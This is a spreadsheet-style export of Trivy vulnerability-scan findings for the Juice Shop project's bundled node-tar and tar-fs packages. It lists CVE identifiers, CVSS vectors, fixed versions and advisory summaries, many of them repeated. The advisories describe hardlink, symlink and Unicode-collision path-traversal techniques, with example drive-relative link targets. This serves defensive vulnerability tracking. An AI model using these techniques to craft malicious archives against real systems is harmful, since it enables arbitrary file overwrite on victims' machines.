",False,,,False,,,,False,juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json,,True,,False,False,,False,,c466c770f612fb7bc67d33f1be0b1d0d9d4f6215583ce50f5834f53d75906525,201,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.488298+00:00,,,,,0,[],7.5.8,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-26960 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384 NEWLINE https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26960 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26960,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26960 Tar 4.4.19,False,False,,2026-05-12 17:37:05.488251+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-26960,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,4.4.19,2026-05-12 17:37:05.492635+00:00,,,CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L,8.2,22,2026-05-12,,,"node-tar: hardlink path traversal via drive-relative linkpath NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.10 NEWLINE NEWLINE node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json,,True,,False,False,,False,,8ba155d70f03e43895717ce0506387e72a16facb4009c3c984ec88bb51532d90,202,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.492721+00:00,,,,,0,[],7.5.10,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-29786 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-29786 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-29786,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-29786 Tar 4.4.19,False,False,,2026-05-12 17:37:05.492647+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-29786,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,4.4.19,2026-05-12 17:37:05.496996+00:00,,,CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N,8.2,22,2026-05-12,,,"tar: tar: File overwrite via drive-relative symlink traversal NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.11 NEWLINE NEWLINE node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json,,True,,False,False,,False,,e0c4122e23742970f005241bcab46e98095e8fccbe44f0880ee16db5333107c0,203,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.497054+00:00,,,,,0,[],7.5.11,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-31802 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-31802 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-31802,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-31802 Tar 4.4.19,False,False,,2026-05-12 17:37:05.497005+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-31802,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,6.2.1,2026-05-12 17:37:05.504125+00:00,,,CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N,8.2,22,2026-05-12,,,"node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.3 NEWLINE NEWLINE node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sqlite3/node_modules/tar/package.json,,True,,False,False,,False,,76cb194d7dc1b333dfa33d886d518de5e5f47410f30aebb9ccfdc7d9a9ce59f4,205,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.504180+00:00,,,,,0,[],7.5.3,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-23745 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-23745 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-23745,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-23745 Tar 6.2.1,False,False,,2026-05-12 17:37:05.504133+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-23745,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,6.2.1,2026-05-12 17:37:05.507771+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L,8.8,,,176,2026-05-12,,,"node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.4 NEWLINE NEWLINE node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`. As a workaround, users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sqlite3/node_modules/tar/package.json,,True,,False,False,,False,,3686fce44e53e14bb2b6ef2aaa3c997e2c7a4a5ff362e5b35cef9413f97c5a9a,206,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.507824+00:00,,,,,0,[],7.5.4,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-23950 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6 NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-23950 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-23950,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-23950 Tar 6.2.1,False,False,,2026-05-12 17:37:05.507779+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-23950,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,6.2.1,2026-05-12 17:37:05.511751+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N,8.2,,,22,2026-05-12,,,"node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.7 NEWLINE NEWLINE node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sqlite3/node_modules/tar/package.json,,True,,False,False,,False,,405ecdd1ba8b164dd967703ca47586640f0f88ee956ac043901ea538988a6409,207,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.511811+00:00,,,,,0,[],7.5.7,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-24842 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46 NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-24842 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-24842,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-24842 Tar 6.2.1,False,False,,2026-05-12 17:37:05.511761+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-24842,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,6.2.1,2026-05-12 17:37:05.515580+00:00,CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N,7.1,,,22,2026-05-12,,,"node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.8 NEWLINE NEWLINE node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sqlite3/node_modules/tar/package.json,,True,,False,False,,False,,5dd11d12f1a19dbc8238c436f1e13578a511b1772c6121a23119b8731aad3137,208,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.515635+00:00,,,,,0,[],7.5.8,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-26960 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384 NEWLINE https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26960 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26960,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26960 Tar 6.2.1,False,False,,2026-05-12 17:37:05.515588+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-26960,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,6.2.1,2026-05-12 17:37:05.519128+00:00,,,CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L,8.2,22,2026-05-12,,,"node-tar: hardlink path traversal via drive-relative linkpath NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.10 NEWLINE NEWLINE node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sqlite3/node_modules/tar/package.json,,True,,False,False,,False,,49418728710e54c2194c84fb7b3f945e6757fd3efdd34cea263134f3d4bd1753,209,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.519181+00:00,,,,,0,[],7.5.10,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-29786 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-29786 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-29786,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-29786 Tar 6.2.1,False,False,,2026-05-12 17:37:05.519136+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-29786,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,6.2.1,2026-05-12 17:37:05.523283+00:00,,,CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N,8.2,22,2026-05-12,,,"tar: tar: File overwrite via drive-relative symlink traversal NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.11 NEWLINE NEWLINE node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sqlite3/node_modules/tar/package.json,,True,,False,False,,False,,f6ff934f52f881818ddd9d914b34629551ab9f71d8c65d05d6872245cb5a44dd,210,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.523380+00:00,,,,,0,[],7.5.11,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-31802 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-31802 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-31802,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-31802 Tar 6.2.1,False,False,,2026-05-12 17:37:05.523297+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-31802,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,7.4.3,2026-05-12 17:37:05.527738+00:00,,,CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N,8.2,22,2026-05-12,,,"node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.3 NEWLINE NEWLINE node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/tar/package.json,,True,,False,False,,False,,4edfb999104b2188b8664ba285455d5be6ca1574859fb6243402b1ab38df8714,211,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.527804+00:00,,,,,0,[],7.5.3,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-23745 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-23745 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-23745,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-23745 Tar 7.4.3,False,False,,2026-05-12 17:37:05.527754+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-23745,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,7.4.3,2026-05-12 17:37:05.531506+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L,8.8,,,176,2026-05-12,,,"node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.4 NEWLINE NEWLINE node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`. As a workaround, users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/tar/package.json,,True,,False,False,,False,,4b613a2e498cc3ab68331c96739669db90d4e453c6fbddf01deea46fd9a781d1,212,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.531560+00:00,,,,,0,[],7.5.4,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-23950 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6 NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-23950 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-23950,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-23950 Tar 7.4.3,False,False,,2026-05-12 17:37:05.531515+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-23950,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,7.4.3,2026-05-12 17:37:05.535166+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N,8.2,,,22,2026-05-12,,,"node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.7 NEWLINE NEWLINE node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/tar/package.json,,True,,False,False,,False,,18093086f89ff56df27fdcae95c9e49d5a1759bfeacd0d8ccf4e1dd3eaaefb3c,213,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.535218+00:00,,,,,0,[],7.5.7,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-24842 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46 NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-24842 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-24842,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-24842 Tar 7.4.3,False,False,,2026-05-12 17:37:05.535173+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-24842,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,7.4.3,2026-05-12 17:37:05.538946+00:00,CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N,7.1,,,22,2026-05-12,,,"node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.8 NEWLINE NEWLINE node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/tar/package.json,,True,,False,False,,False,,d15eabee3470437371b24482cf5f09aab81da810a559a1687f391a97e9008564,214,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.539002+00:00,,,,,0,[],7.5.8,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-26960 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384 NEWLINE https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26960 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26960,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26960 Tar 7.4.3,False,False,,2026-05-12 17:37:05.538954+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-26960,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,7.4.3,2026-05-12 17:37:05.542772+00:00,,,CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L,8.2,22,2026-05-12,,,"node-tar: hardlink path traversal via drive-relative linkpath NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.10 NEWLINE NEWLINE node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/tar/package.json,,True,,False,False,,False,,c60a92f856661c39be172a08bd59d952f01cb9ce0ab4554078696b92069dde66,215,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.542834+00:00,,,,,0,[],7.5.10,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-29786 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-29786 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-29786,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-29786 Tar 7.4.3,False,False,,2026-05-12 17:37:05.542783+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-29786,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,7.4.3,2026-05-12 17:37:05.546856+00:00,,,CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N,8.2,22,2026-05-12,,,"tar: tar: File overwrite via drive-relative symlink traversal NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.11 NEWLINE NEWLINE node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/tar/package.json,,True,,False,False,,False,,487d3800ec1f4bc83994a4f7f5171332e25e0b466b663b2574d00d620dbab286,216,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.546918+00:00,,,,,0,[],7.5.11,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-31802 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-31802 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-31802,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-31802 Tar 7.4.3,False,False,,2026-05-12 17:37:05.546866+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-31802,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar-fs,2.1.3,2026-05-12 17:37:05.550765+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N,8.7,22,2026-05-12,,,"tar-fs: tar-fs symlink validation bypass NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.1.1, 2.1.4, 1.16.6 NEWLINE NEWLINE tar-fs provides filesystem bindings for tar-stream. Versions prior to 3.1.1, 2.1.3, and 1.16.5 are vulnerable to symlink validation bypass if the destination directory is predictable with a specific tarball. This issue has been patched in version 3.1.1, 2.1.4, and 1.16.6. A workaround involves using the ignore option on non files/directories. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/tar-fs/package.json,,True,,False,False,,False,,72344e9bebce8d798e4ea2a5a3e51a72cd00ccd5dd078caa8fbcc4f71eb6702c,217,fixed,False,,False,2026-05-12 